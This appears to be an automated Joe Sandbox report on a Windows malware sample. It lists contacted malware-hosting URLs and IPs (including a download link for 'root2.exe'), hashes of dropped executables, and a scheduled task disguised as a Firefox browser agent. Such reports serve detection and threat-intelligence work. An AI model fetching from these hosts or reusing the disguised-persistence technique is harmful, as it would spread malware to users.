                22.2.5AF.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                SourceDetectionScannerLabelLink
                thepokeway.nl5%VirustotalBrowse
                dowe.at0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://piratia.su/tmp/100%URL Reputationmalware
                http://piratia.su/tmp/100%URL Reputationmalware
                https://thepokeway.nl/upload/index.php0%URL Reputationsafe
                http://cracker.biz/tmp/0%URL Reputationsafe
                http://cracker.biz/tmp/0%URL Reputationsafe
                http://123.253.32.170/root2.exe0%URL Reputationsafe
                http://newhorizonswv.com/tmp/1%VirustotalBrowse
                http://xisac.com/tmp/1%VirustotalBrowse
                http://dowe.at/tmp/0%Avira URL Cloudsafe
                http://xisac.com/tmp/0%Avira URL Cloudsafe
                http://newhorizonswv.com/tmp/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                thepokeway.nl
                		5.135.247.111
                		truetrueunknown
                dowe.at
                		200.46.66.71
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://piratia.su/tmp/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://newhorizonswv.com/tmp/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://thepokeway.nl/upload/index.phpfalse
                • URL Reputation: safe
                		unknown
                http://cracker.biz/tmp/true
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://123.253.32.170/root2.exetrue
                • URL Reputation: safe
                		unknown
                http://piratia-life.ru/tmp/false
                  		high
                  http://dowe.at/tmp/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://xisac.com/tmp/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.338958128.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.291794851.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.322078451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.303824435.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.269421946.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.258393076.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    5.135.247.111
                    		thepokeway.nlFrance
                    		16276OVHFRtrue
                    201.124.230.1
                    		unknownMexico
                    		8151UninetSAdeCVMXfalse
                    123.253.32.170
                    		unknownMalaysia
                    		9924TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvitrue
                    211.59.14.90
                    		unknownKorea Republic of
                    		9318SKB-ASSKBroadbandCoLtdKRfalse
                    200.46.66.71
                    		dowe.atPanama
                    		18809CableOndaPAtrue
                    187.212.179.75
                    		unknownMexico
                    		8151UninetSAdeCVMXfalse

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:756294
                    Start date and time:2022-11-30 00:09:06 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 13m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:file.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:23
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:2
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winEXE@13/9@36/7
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 22.1% (good quality ratio 11.6%)
                    • Quality average: 30.8%
                    • Quality standard deviation: 33.9%
                    HCA Information:
                    • Successful, ratio: 67%
                    • Number of executed functions: 50
                    • Number of non-executed functions: 29
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240s for rundll32

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 20.189.173.21
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    00:10:59Task SchedulerRun new task: Firefox Default Browser Agent F98CC62F1FC24C40 path: C:\Users\user\AppData\Roaming\dfhwrav
                    00:12:07API Interceptor1x Sleep call for process: 5AF.exe modified
                    00:12:20API Interceptor1x Sleep call for process: WerFault.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    5.135.247.111NcuBv4VKxA.exeGet hashmaliciousBrowse
                      file.exeGet hashmaliciousBrowse
                        file.exeGet hashmaliciousBrowse
                          file.exeGet hashmaliciousBrowse
                            file.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    WzXOP3xtNo.exeGet hashmaliciousBrowse
                                      Ku34GMOW3K.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                file.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            thepokeway.nlfile.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            WzXOP3xtNo.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            Ku34GMOW3K.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            UninetSAdeCVMXrobinbotGet hashmaliciousBrowse
                                                            • 187.192.10.153
                                                            robinbotGet hashmaliciousBrowse
                                                            • 187.192.10.153
                                                            taxonomy.dll.dllGet hashmaliciousBrowse
                                                            • 189.255.203.220
                                                            taxonomy.dll.dllGet hashmaliciousBrowse
                                                            • 189.255.203.220
                                                            GyKpRhKQY1.elfGet hashmaliciousBrowse
                                                            • 189.162.82.20
                                                            7HuJu44thW.elfGet hashmaliciousBrowse
                                                            • 201.152.236.63
                                                            abutmentAnemone.jpg.dllGet hashmaliciousBrowse
                                                            • 187.199.224.16
                                                            abutmentAnemone.jpg.dllGet hashmaliciousBrowse
                                                            • 187.199.224.16
                                                            file.exeGet hashmaliciousBrowse
                                                            • 201.124.230.1
                                                            DZ-568.imgGet hashmaliciousBrowse
                                                            • 187.199.224.16
                                                            EZ-465.imgGet hashmaliciousBrowse
                                                            • 187.199.224.16
                                                            file.exeGet hashmaliciousBrowse
                                                            • 187.232.182.23
                                                            sora.arm.elfGet hashmaliciousBrowse
                                                            • 189.255.142.21
                                                            sora.arm.elfGet hashmaliciousBrowse
                                                            • 189.238.52.152
                                                            file.exeGet hashmaliciousBrowse
                                                            • 187.212.179.75
                                                            test1.dllGet hashmaliciousBrowse
                                                            • 187.199.224.16
                                                            test1.dllGet hashmaliciousBrowse
                                                            • 187.199.224.16
                                                            file.exeGet hashmaliciousBrowse
                                                            • 201.124.230.1
                                                            Mddos.arm7.elfGet hashmaliciousBrowse
                                                            • 148.212.115.106
                                                            Mddos.x86.elfGet hashmaliciousBrowse
                                                            • 187.142.69.168
                                                            OVHFRReceipt Order No. 20803415.pif.exeGet hashmaliciousBrowse
                                                            • 91.121.228.166
                                                            http://big55555.comGet hashmaliciousBrowse
                                                            • 54.36.0.53
                                                            NcuBv4VKxA.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            Remittance.htmlGet hashmaliciousBrowse
                                                            • 51.210.156.152
                                                            NHYGUnNN.exeGet hashmaliciousBrowse
                                                            • 54.38.220.85
                                                            PDF.shtmlGet hashmaliciousBrowse
                                                            • 146.59.209.152
                                                            MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                            • 51.195.62.160
                                                            DHJ59300948.xlsGet hashmaliciousBrowse
                                                            • 188.165.213.20
                                                            Wzf4gWTOC2.exeGet hashmaliciousBrowse
                                                            • 188.165.213.20
                                                            35JTigDQD0.elfGet hashmaliciousBrowse
                                                            • 149.56.12.10
                                                            https://ipfs.io/ipfs/QmZscYPiZiEyUufsiTp73rjGySUVKx6mbYrEnns9n7DNVh?filename=ownredirectautoweb.html#news@pitchfork.comGet hashmaliciousBrowse
                                                            • 51.89.9.254
                                                            https://paper.li/lnMHi8ZFENoxtKejQDZMh/story/document-confidential-m8ZkThqLiTXweW3JUxcg2Get hashmaliciousBrowse
                                                            • 37.187.86.201
                                                            8kH56VSq58.elfGet hashmaliciousBrowse
                                                            • 192.99.71.226
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            BL-NO-OOLU2136901180.vbsGet hashmaliciousBrowse
                                                            • 213.186.33.5
                                                            Services_Jingce_Quotation28112022.exeGet hashmaliciousBrowse
                                                            • 149.56.23.213
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            justificante de transferencia.vbeGet hashmaliciousBrowse
                                                            • 164.132.238.203
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            ce5f3254611a8c095a3d821d44539877RFQ_SFOETH12.jsGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            Shipping-Documents.jsGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            Rfq#Specification.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            Ku34GMOW3K.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111
                                                            file.exeGet hashmaliciousBrowse
                                                            • 5.135.247.111

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c7d966c262eae458e8625727f886cf5c34890_82810a17_123adcc3\Report.wer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.946006514417489
                                                            Encrypted:false
                                                            SSDEEP:192:cfiw0oXVHqqBIKjed+Mb/u7s9S274ItWc:UimXFqqBIKjet/u7s9X4ItWc
                                                            MD5:D7A37DE7937004741090755840C56D79
                                                            SHA1:08CE77055D65D3FB07F4642E33D2F2FE9FA7F068
                                                            SHA-256:E9915E6CFE487068FD5A96B376F5EE8D9DAAE0D1E992844CF29320ED14B2E658
                                                            SHA-512:57B5F8721B439B74F09FA5700C08ACE11645FE3D0342F8FEC4D13350A6C1F7971E92B369FF069AA3D6CDE41CDE4039F46A7C5B3088E92CEBF312EDB776A268AA
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.2.6.9.5.2.8.0.7.9.9.5.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.2.6.9.5.3.7.8.7.6.8.1.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.e.6.e.d.c.e.-.2.6.8.1.-.4.f.d.2.-.9.a.6.a.-.7.2.1.4.6.1.a.2.3.d.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.2.8.e.0.b.f.-.c.0.3.d.-.4.f.d.c.-.9.7.6.0.-.5.b.4.d.1.c.4.7.b.3.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.3.0.-.0.0.0.1.-.0.0.1.a.-.0.a.1.3.-.f.9.5.d.9.3.0.4.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER3392.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Wed Nov 30 08:12:12 2022, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):46956
                                                            Entropy (8bit):2.1379555772918506
                                                            Encrypted:false
                                                            SSDEEP:192:/WFLAtpZkO5SkbAR+TPZQfDx0+Kyrx+p9R6NnX:ikr5Lbw+T810+KyreW
                                                            MD5:52C8A7752FFF58EDBB70514842507A1C
                                                            SHA1:3EC49B493F90C8EFA19791C3B209ED0E12571597
                                                            SHA-256:D764C68A2933F74A24F55FC5A5F2196F21F480B45050B2453DE8A4E3414AA7B5
                                                            SHA-512:C5F9E6EF985783BD64DE5E8D710A5E3B8683F94B17E7FA26BA24FF212D59E29DAC1E91EF9B39E70424F1D60E378EBB16122C24E1E84864A4AF760F2C27AA393A
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MDMP....... .......\..c........................D................/..........T.......8...........T...........................................................................................................U...........B......d.......GenuineIntelW...........T.......0...8..c............................. ..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER497D.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8300
                                                            Entropy (8bit):3.685442373729347
                                                            Encrypted:false
                                                            SSDEEP:192:Rrl7r3GLNibK6ha0ZD6Yqf6waEgmfTMSmDCprG89bxZdPsfezZFm:RrlsNiG6haID6YK6waEgmfTMSm8xz0f/
                                                            MD5:42BF5C06FE5E8831D8CE69305340AD29
                                                            SHA1:C7520BAB8F0C88EFBC5978AD7935EC96D2302F64
                                                            SHA-256:DB24A8015F5D0F08788DCF361FB862360309BF58424A46B40F171A6823F55AA0
                                                            SHA-512:BEC099C7C3A11EEF2C57EB72CD63A7CBD54B5AE8360AAB0619BC6BAFB015958C74635D087D9E4AE18F04C1BD0ADE0AB700DF3D4425FF877497AE0CCD2EDD9C87
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.1.2.<./.P.i.d.>.......

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER5054.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4640
                                                            Entropy (8bit):4.458377130044554
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwSD8zsZJgtWI9GgWgc8sqYjf8fm8M4JCdsFIAaFok+q8/RgEAd4SrSed:uITfrtZgrsqYQJvIakE1MDWed
                                                            MD5:D4368A447707DE8D83F7436078D8256F
                                                            SHA1:FDF53267338C0952A6E2DD6068F84231CD8EEAA8
                                                            SHA-256:2E04AD13C67C592A218330DD8EE0FAA5CE495AD4CA411ED5B137B7BBF20702EC
                                                            SHA-512:6501494A3D39F7D44802703508A10357AA32211B8BBA3C7F93766372132C2F8B8637ACD60B756E18A9A35E53BB1DC2E48407E248589F57E5ED77E86C8868B9E5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802482" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                            C:\Users\user\AppData\Local\Temp\5AF.exe

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):478208
                                                            Entropy (8bit):7.834422761413108
                                                            Encrypted:false
                                                            SSDEEP:6144:i+i6S2IYNFu4Ldu//tUVBcR3QQtZ2b6ptsDCsJnQAC+iVjQoFsLVCcde2Zq3mLW:q2IgEYKKq3QQWFCRX4ccdecU
                                                            MD5:C81AB83835C2669DBE57C43DB54571B7
                                                            SHA1:C06EE015340CBDFAA7AF2E820A8EE166179B09E2
                                                            SHA-256:727AC1966886E3D083330FCDE19D79C445DE9FE2A0E306F9FEB94D28BE54F776
                                                            SHA-512:4BA429D9A37D1A3B1C72029DB9D86E44B30DB40EB05CF8248CD6B7BC6CD332B25605B0A84CC6E63DA6F55191A0FA5D91B9C2610E2C30E232844C6AB37F0B0657
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I....4.I.+...$.I.+...].I..]2.2.I.5.H.I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L...%..b.............................L....... ....@.................................8...........................................P....p..P0...........................................................,..@...............<............................text............................... ..`.data....D... ......................@....rsrc...P0...p...2..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\ADCA.exe

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3776000
                                                            Entropy (8bit):7.994112157171111
                                                            Encrypted:true
                                                            SSDEEP:98304:CIPeMtJl37YfXo0/PrjRkwoD8sOr+616vbgD7op:CIPeMh37YfXZPvRkww3OrNEgo
                                                            MD5:2479739C5D062ECB325147623241F007
                                                            SHA1:4394B6D2CA4ED82A5F2D70D10CD05CFA3B35AB2C
                                                            SHA-256:728DE9789AF5F2EBC9AC2FAC80FEE25B186BC5B3ACB960650934377F0C77726D
                                                            SHA-512:1C5C4D7D7FD5A7F18FED87A0D66B95B26EBFDA33B4AA4F66FD8FD4432E07EBC6E6289A27FFCCC1CF99E659AEB80434E833BAA299AB140D82C0BCB7D863A58301
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I....4.I.+...$.I.+...].I..]2.2.I.5.H.I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L......`......................<......L....... ....@.......................... O.......:.........................................P.....<.P0.................................................. -.......,..@...............<............................text............................... ..`.data.....;.. ...`8.................@....rsrc...PP....<..2...l9.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\ADCA.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4494336
                                                            Entropy (8bit):6.5734549407418505
                                                            Encrypted:false
                                                            SSDEEP:98304:2Ekp3AUUgGFofLw++PxAbc5rh5Ar/04TA4P:gp31UtFmLw95Abc5rh5Ar/NTA
                                                            MD5:AA90603343B982D2D28D56CCE94C696E
                                                            SHA1:8E1ED433C2958BDA927279C0D47C4C4B7C39290C
                                                            SHA-256:07F50A84E6567DF42216C4F1C640AEAC436B19340CCCB82B21EFAB2E1F9F3FB1
                                                            SHA-512:CEC1F4B745B0F2A54AF74C32E6F3631589D2795E1396FEB3E1C51198C16A985F871D915EC9F988F763A7774F96F76AA922D3BF9EF3195BD44443E633814A0B09
                                                            Malicious:true
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c..................?.........X&?......0?...@..........................pE.......................................@......@@..9....E..d....................@.4A...................................................J@.......@......................text.....>.......>................. ..`.itext..t.....?.......>............. ..`.data.......0?.......?.............@....bss....Tg....?..........................idata...9...@@..:....?.............@....didata.......@.......?.............@....edata........@.......?.............@..@.rdata..D.....@.......?.............@..@.reloc..4A....@..B....?.............@..B.rsrc....d....E..d...0D.............@..@.............pE.......D.............@..@........................................................

                                                            C:\Users\user\AppData\Roaming\dfhwrav

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):149504
                                                            Entropy (8bit):7.100027517135632
                                                            Encrypted:false
                                                            SSDEEP:3072:TD+CPq0Ubn6u2DUp5Gcw2FPOXDMMMMfq2SQw7Se1Ei4KY+NzfOFV:W0qln6u2I8q25wV4V+NzcV
                                                            MD5:1CF06BEB83D2BD1AFD1B9B62994E7549
                                                            SHA1:88BD7DA7668FB669B5503696EE0A9C0F2DBECEB7
                                                            SHA-256:4DC0DE570728F75F844C7AFB84AC6C809EF4620DAC3B12A884FF9916F5B5B0EE
                                                            SHA-512:79196551EDCB7850817C3132971D25423BD6861849E21926E03647B0D4EE76D3EE7CBE456C78D046167F196991E3D286C393A8ABC22E8218ED148BC90090FFD9
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.'.5.I.5.I.5.I....4.I.+...$.I.+...].I..]2.2.I.5.H.I.+.....I.+...4.I.+...4.I.Rich5.I.................PE..L.....5a.............................L....... ....@.................................#...........................................P....p..P0...........................................................,..@...............<............................text............................... ..`.data...hB... ......................@....rsrc...P0...p...2..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Roaming\dfhwrav:Zone.Identifier

                                                            Download File
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.100027517135632
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
